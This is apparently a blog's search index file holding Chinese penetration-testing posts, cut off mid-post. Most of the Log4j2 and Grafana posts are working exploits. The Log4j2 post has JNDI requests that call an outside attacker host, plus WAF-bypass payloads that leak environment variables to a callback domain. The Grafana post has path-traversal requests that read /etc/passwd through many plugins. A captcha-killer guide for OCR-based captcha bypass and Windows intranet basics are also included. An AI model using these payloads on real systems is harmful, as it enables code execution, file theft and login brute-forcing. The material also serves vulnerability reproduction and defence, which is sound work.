-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsearch.xml
More file actions
748 lines (359 loc) · 182 KB
/
search.xml
File metadata and controls
748 lines (359 loc) · 182 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>BurpSuite插件captcha-killer识别图片验证码(跳坑记)</title>
<link href="/article/bbde9c6d.html"/>
<url>/article/bbde9c6d.html</url>
<content type="html"><![CDATA[<h2 id="使用burp插件captcha-killer识别图片验证码"><a href="#使用burp插件captcha-killer识别图片验证码" class="headerlink" title="使用burp插件captcha-killer识别图片验证码"></a>使用burp插件captcha-killer识别图片验证码</h2><h3 id="一、0x01插件简介"><a href="#一、0x01插件简介" class="headerlink" title="一、0x01插件简介"></a>一、0x01插件简介</h3><p>burp2020前使用:<code>https://github.com/c0ny1/captcha-killer/tree/0.1.2</code></p><p>burp2020使用:<code>https://github.com/Ta0ing/captcha-killer-java8</code></p><p> captcha-killer要解决的问题是让burp能用上各种验证码识别技术!插件当前针对的图片类型验证码,其他类型当前不支持。captcha-killer本身无法识别验证码,它专注于对各种验证码识别接口的调用。<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211220104938772.png" alt="插件识别截图"></p><h3 id="二、插件使用介绍"><a href="#二、插件使用介绍" class="headerlink" title="二、插件使用介绍"></a>二、插件使用介绍</h3><h4 id="2-1-百度识别验证码接口:"><a href="#2-1-百度识别验证码接口:" class="headerlink" title="2.1 百度识别验证码接口:"></a>2.1 百度识别验证码接口:</h4><ul><li>调用百度ocr识别验证码<br><code>https://cloud.baidu.com/product/ocr_general</code><br><img src="https://img2020.cnblogs.com/blog/1579478/202009/1579478-20200930161712883-798203260.png"></li></ul><p>创建一个应用然后记录API Key Secret Key用来获取Access Token具体可以看<code>https://ai.baidu.com/ai-doc/REFERENCE/Ck3dwjhhu</code><br>获取access_token方法:</p><pre class="line-numbers language-none"><code class="language-none">curl -i -k 'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&client_id=【百度云应用的AK】&client_secret=【百度云应用的SK】'<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p><img src="https://img2020.cnblogs.com/blog/1579478/202009/1579478-20200930161724768-746800088.png"></p><h4 id="2-使用插件captcha-killer自带的baiduocr模板"><a href="#2-使用插件captcha-killer自带的baiduocr模板" class="headerlink" title="2.使用插件captcha-killer自带的baiduocr模板"></a>2.使用插件captcha-killer自带的baiduocr模板</h4><p><img src="https://img2020.cnblogs.com/blog/1579478/202009/1579478-20200930161731781-417461223.png"></p><p>更改这两个地方为你的应用的接口地址和access_token<br><img src="https://img2020.cnblogs.com/blog/1579478/202009/1579478-20200930161741299-1654241370.png"></p><p><img src="https://img2020.cnblogs.com/blog/1579478/202009/1579478-20200930161748163-2022030841.png"></p><h4 id="2-2-图鉴识别验证码接口:"><a href="#2-2-图鉴识别验证码接口:" class="headerlink" title="2.2 图鉴识别验证码接口:"></a>2.2 图鉴识别验证码接口:</h4><p>接口URL<code>http://api.ttshitu.com:80</code></p><pre class="line-numbers language-none"><code class="language-none">POST /predict HTTP/1.1Host: api.ttshitu.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Accept: application/json;Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: Hm_lvt_d92eb5418ecf5150abbfe0e505020254=1585994993,1586144399; SESSION=5ebf9c31-a424-44f8-8188-62ca56de7bdf; Hm_lpvt_d92eb5418ecf5150abbfe0e505020254=1586****Connection: closeContent-Type: application/json;charset=UTF-8Content-Length: 109{"username":"***","password":"******","typeid":"3","image":"<@BASE64><@IMG_RAW></@IMG_RAW></@BASE64>"}<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211220105257508.png" alt="识别展示"></p>]]></content>
<categories>
<category> 技巧类 </category>
</categories>
<tags>
<tag> BurpSuite Script </tag>
</tags>
</entry>
<entry>
<title>Log4j2 远程代码执行漏洞</title>
<link href="/article/183cb454.html"/>
<url>/article/183cb454.html</url>
<content type="html"><![CDATA[<h2 id="Log4j2-远程代码执行漏洞"><a href="#Log4j2-远程代码执行漏洞" class="headerlink" title="Log4j2 远程代码执行漏洞"></a>Log4j2 远程代码执行漏洞</h2><h3 id="一、漏洞描述"><a href="#一、漏洞描述" class="headerlink" title="一、漏洞描述"></a>一、漏洞描述</h3><h3 id="二、漏洞复现"><a href="#二、漏洞复现" class="headerlink" title="二、漏洞复现"></a>二、漏洞复现</h3><p><code>"app:"unifi-摄像头""</code></p><p><a href="https://codechina.csdn.net/mirrors/feihong-cs/JNDIExploit">https://codechina.csdn.net/mirrors/feihong-cs/JNDIExploit</a></p><pre class="line-numbers language-none"><code class="language-none">POST /api/2.0/login HTTP/1.1Host: 127.167.200.245:7443User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0cmd:whoamiConnection: closeContent-Type: application/jsonContent-Length: 91{"username":"${jndi:ldap://192.168.235.249:1389/Basic/TomcatEcho}", "password":"dasfdasfads"}<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211210204858902.png" alt="image-20211210204858902"></p><pre class="line-numbers language-none"><code class="language-none">${jndi:ldap://0107881c.dns.1433.eu.org/test}JHtqbmRpOmxkYXA6Ly94eHguZG5zbG9nLmNuL3Rlc3R9${${env:foo:-jndi}:dlap://127.0.0.1:1234/exp}${jndi:dns://${sys:java.version}.dns.com}}<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre><p>Log4j Bypass WAF Payloads:</p><pre class="line-numbers language-none"><code class="language-none">${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}${jndi:rmi://adsasd.asdasd.asdasd}${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}${jndi:ldap://127.0.0.1:1389/ badClassName}${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p>参考:</p><pre class="line-numbers language-none"><code class="language-none">https://github.com/apache/logging-log4j2/pull/608/commits/755e2c9d57f0517a73d16bfcaed93cc91969bdeehttps://mp.weixin.qq.com/s/wC7mrK1Y4DYz9_yW4fLzbwhttps://mp.weixin.qq.com/s/K74c1pTG6m5rKFuKaIYmPghttps://mp.weixin.qq.com/s/jp_jBd9SN8pHy3jYc1rnTghttps://github.com/christophetd/log4shell-vulnerable-app<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre><p>解决方案:<br>log4j2.formatMsgNoLookups=True<br>紧急方案就第一 网络拦截,第二防止外联,第三吧功能关了</p><p><strong>1.升级到最新版本:</strong></p><p>请联系厂商获取修复后的官方版本:</p><p><a href="https://github.com/apache/logging-log4j2">https://github.com/apache/logging-log4j2</a></p><p>已发现官方修复代码,目前尚未正式发布:</p><p><a href="https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1%E6%88%96%E9%87%87%E7%94%A8%E5%A5%87%E5%AE%89%E4%BF%A1%E4%BA%A7%E5%93%81%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88%E6%9D%A5%E9%98%B2%E6%8A%A4%E6%AD%A4%E6%BC%8F%E6%B4%9E%E3%80%82">https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1或采用奇安信产品解决方案来防护此漏洞。</a></p><p><strong>2.缓解措施:</strong></p><p>(1). jvm参数 -Dlog4j2.formatMsgNoLookups=true </p><p>(2). log4j2.formatMsgNoLookups=True</p><p>(3).系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为true</p>]]></content>
<categories>
<category> 例如漏洞复现 </category>
</categories>
<tags>
<tag> Apache Log4j2 </tag>
</tags>
</entry>
<entry>
<title>Grafana 任意文件读取漏洞</title>
<link href="/article/76794d41.html"/>
<url>/article/76794d41.html</url>
<content type="html"><![CDATA[<h3 id="一、漏洞描述"><a href="#一、漏洞描述" class="headerlink" title="一、漏洞描述"></a>一、漏洞描述</h3><p>Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。</p><p>Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。</p><p>该漏洞危害等级:高危</p><p>该漏洞源于Grafana 在获取公共插件资产的相关函数中对于路径参数的字符清理不当,导致攻击者可以通过将包含特殊目录遍历字符序列(../)的特制HTTP请求发送到受影响的设备来利用此漏洞。成功利用该漏洞的攻击者可以在目标设备上查看文件系统上的的任意文件。</p><h3 id="二、漏洞复现"><a href="#二、漏洞复现" class="headerlink" title="二、漏洞复现"></a>二、漏洞复现</h3><p>简单判断是否存在:/public/plugins/a/a</p><p>400 啥的需要考虑中间件</p><pre class="line-numbers language-none"><code class="language-none">GET /public/plugins/a/a HTTP/1.1Host: Your Ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: zh-CN,en;q=0.5Accept-Encoding: gzip, deflateConnection: closePragma: no-cacheCache-Control: no-cache<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207164607823.png" alt="存在漏洞"></p><h4 id="POC:"><a href="#POC:" class="headerlink" title="POC:"></a>POC:</h4><pre class="line-numbers language-none"><code class="language-none">GET /public/plugins/grafana-clock-panel/../../../../../../etc/passwd HTTP/1.1Host: Your Ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211207233920551.png" alt="利用截图"></p><p><strong>默认安装插件</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/144999119-26b04c63-e8bc-49f6-9fc4-c05a8f41d585.png" alt="插件"></p><pre class="line-numbers language-none"><code class="language-none">/public/plugins/alertGroups/../../../../../../../../etc/passwd/public/plugins/alertlist/../../../../../../../../etc/passwd/public/plugins/alertmanager/../../../../../../../../etc/passwd/public/plugins/annolist/../../../../../../../../etc/passwd/public/plugins/barchart/../../../../../../../../etc/passwd/public/plugins/bargauge/../../../../../../../../etc/passwd/public/plugins/canvas/../../../../../../../../etc/passwd/public/plugins/cloudwatch/../../../../../../../../etc/passwd/public/plugins/dashboard/../../../../../../../../etc/passwd/public/plugins/dashlist/../../../../../../../../etc/passwd/public/plugins/debug/../../../../../../../../etc/passwd/public/plugins/elasticsearch/../../../../../../../../etc/passwd/public/plugins/gauge/../../../../../../../../etc/passwd/public/plugins/geomap/../../../../../../../../etc/passwd/public/plugins/gettingstarted/../../../../../../../../etc/passwd/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd/public/plugins/grafana/../../../../../../../../etc/passwd/public/plugins/graph/../../../../../../../../etc/passwd/public/plugins/graphite/../../../../../../../../etc/passwd/public/plugins/heatmap/../../../../../../../../etc/passwd/public/plugins/histogram/../../../../../../../../etc/passwd/public/plugins/influxdb/../../../../../../../../etc/passwd/public/plugins/jaeger/../../../../../../../../etc/passwd/public/plugins/live/../../../../../../../../etc/passwd/public/plugins/logs/../../../../../../../../etc/passwd/public/plugins/loki/../../../../../../../../etc/passwd/public/plugins/mixed/../../../../../../../../etc/passwd/public/plugins/mssql/../../../../../../../../etc/passwd/public/plugins/mysql/../../../../../../../../etc/passwd/public/plugins/news/../../../../../../../../etc/passwd/public/plugins/nodeGraph/../../../../../../../../etc/passwd/public/plugins/opentsdb/../../../../../../../../etc/passwd/public/plugins/piechart/../../../../../../../../etc/passwd/public/plugins/pluginlist/../../../../../../../../etc/passwd/public/plugins/postgres/../../../../../../../../etc/passwd/public/plugins/prometheus/../../../../../../../../etc/passwd/public/plugins/stat/../../../../../../../../etc/passwd/public/plugins/state-timeline/../../../../../../../../etc/passwd/public/plugins/status-history/../../../../../../../../etc/passwd/public/plugins/table-old/../../../../../../../../etc/passwd/public/plugins/table/../../../../../../../../etc/passwd/public/plugins/tempo/../../../../../../../../etc/passwd/public/plugins/testdata/../../../../../../../../etc/passwd/public/plugins/text/../../../../../../../../etc/passwd/public/plugins/timeseries/../../../../../../../../etc/passwd/public/plugins/welcome/../../../../../../../../etc/passwd/public/plugins/xychart/../../../../../../../../etc/passwd/public/plugins/zipkin/../../../../../../../../etc/passwd<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><a href="https://github.com/jas502n/Grafana-VulnTips/blob/main/README.md">Grafana Unauthorized arbitrary file reading vulnerability</a></p><p><a href="https://github.com/Mr-xn/CVE-2021-43798">https://github.com/Mr-xn/CVE-2021-43798</a></p><p>RCE方法–>读库,有几率获取 AccessKey</p><p>EXPTools:<a href="https://github.com/A-D-Team/grafanaExp">https://github.com/A-D-Team/grafanaExp</a></p><p>参考:</p><pre class="line-numbers language-none"><code class="language-none">https://vas.riskivy.com/vuln-detail?id=104https://nosec.org/home/detail/4914.html<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> Grafana </tag>
</tags>
</entry>
<entry>
<title>【内网渗透】01 Windows 基础回顾]</title>
<link href="/article/803abef8.html"/>
<url>/article/803abef8.html</url>
<content type="html"><![CDATA[<h2 id="内网学习-Windows基础回顾"><a href="#内网学习-Windows基础回顾" class="headerlink" title="内网学习-Windows基础回顾"></a>内网学习-Windows基础回顾</h2><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/496062add1d3223806b2504c321c051d.png" alt="拓扑"></p><h3 id="一、Tools:"><a href="#一、Tools:" class="headerlink" title="一、Tools:"></a>一、Tools:</h3><pre class="line-numbers language-none"><code class="language-none">掌握impacket工具包:使用--原理--编写 == 大成https://github.com/SecureAuthCorp/impacketdnspyHXDSoftEther VPNWindows Admin center 微软出品,用来远程管理电脑Autoruns 开机启动项管理工具课外阅读:https://cloud.tencent.com/developer/article/1769697<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><h3 id="二、内网渗透理解"><a href="#二、内网渗透理解" class="headerlink" title="二、内网渗透理解"></a>二、内网渗透理解</h3><p>渗透测试本质是信息收集,内网对抗本身是对Windows的对抗。Linux较少</p><h3 id="三、Windows基础回顾"><a href="#三、Windows基础回顾" class="headerlink" title="三、Windows基础回顾"></a>三、Windows基础回顾</h3><h4 id="3-1-环境变量"><a href="#3-1-环境变量" class="headerlink" title="3.1 环境变量"></a>3.1 环境变量</h4><p>所有命令行其实都是二进制的可执行文件。如果cmd 是 <code>c:\Windows\system32\whoami.exe</code> 可以做个小实验,设置自己的exe到任意目录。</p><p>查看环境变量:<code>set</code></p><p>设置环境变量:<code>set tempname = uunicodesec</code></p><p>查询环境变量:<code>set | findstr r</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211126103615903.png" alt="环境变量"></p><h4 id="3-2-文件"><a href="#3-2-文件" class="headerlink" title="3.2 文件"></a>3.2 文件</h4><p><strong>3.2.1 Magic number</strong></p><p>即幻数,它可以用来标记文件或者协议的格式,很多文件都有幻数标志来表明该文件的格式。数头(Magic number)</p><ul><li>ZIP Archive(zip): 文件头 504B0304</li><li>RAR Archive(ara): 文件头 52617221</li><li>JPEG(jpg) 文件头 FFD8FF</li><li>PNG(png) 文件头 89504E47</li><li>GIF(gif) 文件头 47494638</li></ul><p><strong>3.2.2 PE 文件</strong></p><p>MZ头</p><p><strong>3.2.3 文件时间</strong></p><ul><li>创建时间:是表示这个文件存在机器上的时间,当文件信息首次出现在当前硬盘上时</li><li>修改时间:这次更新的是对文件内容的单个更改,例如当您更改文件的内容并使用vim等工具保存它时,文件修改时间就会发生变化</li><li>访问时间:一旦文件的内容被读取,时间就会更新。例如在文件中使用较少的命令或请求较多的命令、</li></ul><p><strong>3.2.3 ACL</strong></p><p>ICACLS</p><pre class="line-numbers language-none"><code class="language-none">ICACLS name /save aclfile [/T] [/C] [/L] [/Q] 将匹配名称的文件和文件夹的 DACL 存储到 aclfile 中 以便将来与 /restore 一起使用。请注意,未保存 SACL、 所有者或完整性标签。ICACLS directory [/substitute SidOld SidNew [...]] /restore aclfile [/C] [/L] [/Q] 将存储的 DACL 应用于目录中的文件。ICACLS name /setowner user [/T] [/C] [/L] [/Q] 更改所有匹配名称的所有者。该选项不会强制更改所有 身份;使用 takeown.exe 实用程序可实现 该目的。ICACLS name /findsid Sid [/T] [/C] [/L] [/Q] 查找包含显式提及 SID 的 ACL 的 所有匹配名称。ICACLS name /verify [/T] [/C] [/L] [/Q] 查找其 ACL 不规范或长度与 ACE 计数不一致的所有文件。ICACLS name /reset [/T] [/C] [/L] [/Q] 为所有匹配文件使用默认继承的 ACL 替换 ACL。ICACLS name [/grant[:r] Sid:perm[...]] [/deny Sid:perm [...]] [/remove[:g|:d]] Sid[...]] [/T] [/C] [/L] [/Q] [/setintegritylevel Level:policy[...]] /grant[:r] Sid:perm 授予指定的用户访问权限。如果使用 :r, 这些权限将替换以前授予的所有显式权限。 如果不使用 :r,这些权限将添加到以前授予的 所有显式权限。 /deny Sid:perm 显式拒绝指定的用户访问权限。 将为列出的权限添加显式拒绝 ACE, 并删除所有显式授予的权限中的相同权限。 /remove[:[g|d]] Sid 删除 ACL 中所有出现的 SID。使用 :g,将删除授予该 SID 的所有权限。使用 :d,将删除拒绝该 SID 的所有权限。 /setintegritylevel [(CI)(OI)]级别将完整性 ACE 显式 添加到所有匹配文件。要指定的级别为以下级别 之一: L[ow] M[edium] H[igh] 完整性 ACE 的继承选项可以优先于级别,但只应用于 目录。 /inheritance:e|d|r e - 启用继承 d - 禁用继承并复制 ACE r - 删除所有继承的 ACE注意: Sid 可以采用数字格式或友好的名称格式。如果给定数字格式, 那么请在 SID 的开头添加一个 *。 /T 指示在以该名称指定的目录下的所有匹配文件/目录上 执行此操作。 /C 指示此操作将在所有文件错误上继续进行。 仍将显示错误消息。 /L 指示此操作在符号 链接本身而不是其目标上执行。 /Q 指示 icacls 应该禁止显示成功消息。 ICACLS 保留 ACE 项的规范顺序: 显式拒绝 显式授予 继承的拒绝 继承的授予 perm 是权限掩码,可以指定两种格式之一: 简单权限序列: N - 无访问权限 F - 完全访问权限 M - 修改权限 RX - 读取和执行权限 R - 只读权限 W - 只写权限 D - 删除权限 在括号中以逗号分隔的特定权限列表: DE - 删除 RC - 读取控制 WDAC - 写入 DAC WO - 写入所有者 S - 同步 AS - 访问系统安全性 MA - 允许的最大值 GR - 一般性读取 GW - 一般性写入 GE - 一般性执行 GA - 全为一般性 RD - 读取数据/列出目录 WD - 写入数据/添加文件 AD - 附加数据/添加子目录 REA - 读取扩展属性 WEA - 写入扩展属性 X - 执行/遍历 DC - 删除子项 RA - 读取属性 WA - 写入属性 继承权限可以优先于每种格式,但只应用于 目录: (OI) - 对象继承 (CI) - 容器继承 (IO) - 仅继承 (NP) - 不传播继承 (I) - 从父容器继承的权限示例: icacls c:\windows\* /save AclFile /T - 将 c:\windows 及其子目录下所有文件的 ACL 保存到 AclFile。 icacls c:\windows\ /restore AclFile - 将还原 c:\windows 及其子目录下存在的 AclFile 内 所有文件的 ACL。 icacls file /grant Administrator:(D,WDAC) - 将授予用户对文件删除和写入 DAC 的管理员 权限。 icacls file /grant *S-1-1-0:(D,WDAC) - 将授予由 sid S-1-1-0 定义的用户对文件删除和 写入 DAC 的权限。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211126110020640.png" alt="权限"></p><p><strong>3.2.3 Windows 目录结构</strong></p><p><strong>Users</strong>文件夹内包含着用户的一些信息和资料</p><p><strong>program files</strong></p><p>Program Files 指的是程序文件,也就是Windows 操作系统,也包括其它的操作系统各种软件默认安装到的目录。位于C盘分区(”C:\Program Files”,”%ProgramFiles%”)。</p><p><strong>AppData</strong></p><p> Appdata文件位于系统盘(一般是C盘)→用户→Default 目录下,里面还包含了Locallow、Local转、Loaming等文件夹,具体功能如下。</p><p>1、locallow:共享数据存放文件,一般都可以清理一些无用的共享文件。</p><p>2、Local:本地保存文件,其中本地临时文件,AppData\Local\Temp\下面的文件可以删除(注意是Temp)。</p><p>3、Roaming:保存应用程序运行后的数据信息,如果删除应用程序运行配置数据会丢失</p><p><strong>ProgramDate</strong></p><p>ProgramDate文件夹属于电脑 C盘的一个系统文件夹,它是公用的被创建文件夹或文件存放的地方,这些文件夹或文件仅由创建者完整控制。</p><h4 id="3-3-路由设置"><a href="#3-3-路由设置" class="headerlink" title="3.3 路由设置"></a>3.3 路由设置</h4><pre class="line-numbers language-none"><code class="language-none">tracert baidu.comroute printnetstat -rroute add 70.34.197.181 mask 255.255.255.255 192.168.103.1 route delete 192.168.0.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre><h4 id="Events"><a href="#Events" class="headerlink" title="Events"></a>Events</h4><p><a href="https://cloud.tencent.com/developer/article/1769697">安全蓝队 : windows日志检索和分析</a></p><h3 id="四、服务-Services)"><a href="#四、服务-Services)" class="headerlink" title="四、服务(Services)"></a>四、服务(<strong>Services</strong>)</h3><blockquote><p>Microsoft Windows 服务(过去称为 NT 服务)允许用户创建可在其自身的 Windows 会话中长时间运行的可执行应用程序。 这些服务可在计算机启动时自动启动,可以暂停和重启,并且不显示任何用户界面。 这些功能使服务非常适合在服务器上使用,或者需要长时间运行的功能(不会影响在同一台计算机上工作的其他用户)的情况。 还可以在与登录用户或默认计算机帐户不同的特定用户帐户的安全性上下文中运行服务。</p></blockquote><h4 id="4-1-服务生存周期"><a href="#4-1-服务生存周期" class="headerlink" title="4.1 服务生存周期"></a>4.1 <strong>服务生存周期</strong></h4><p> 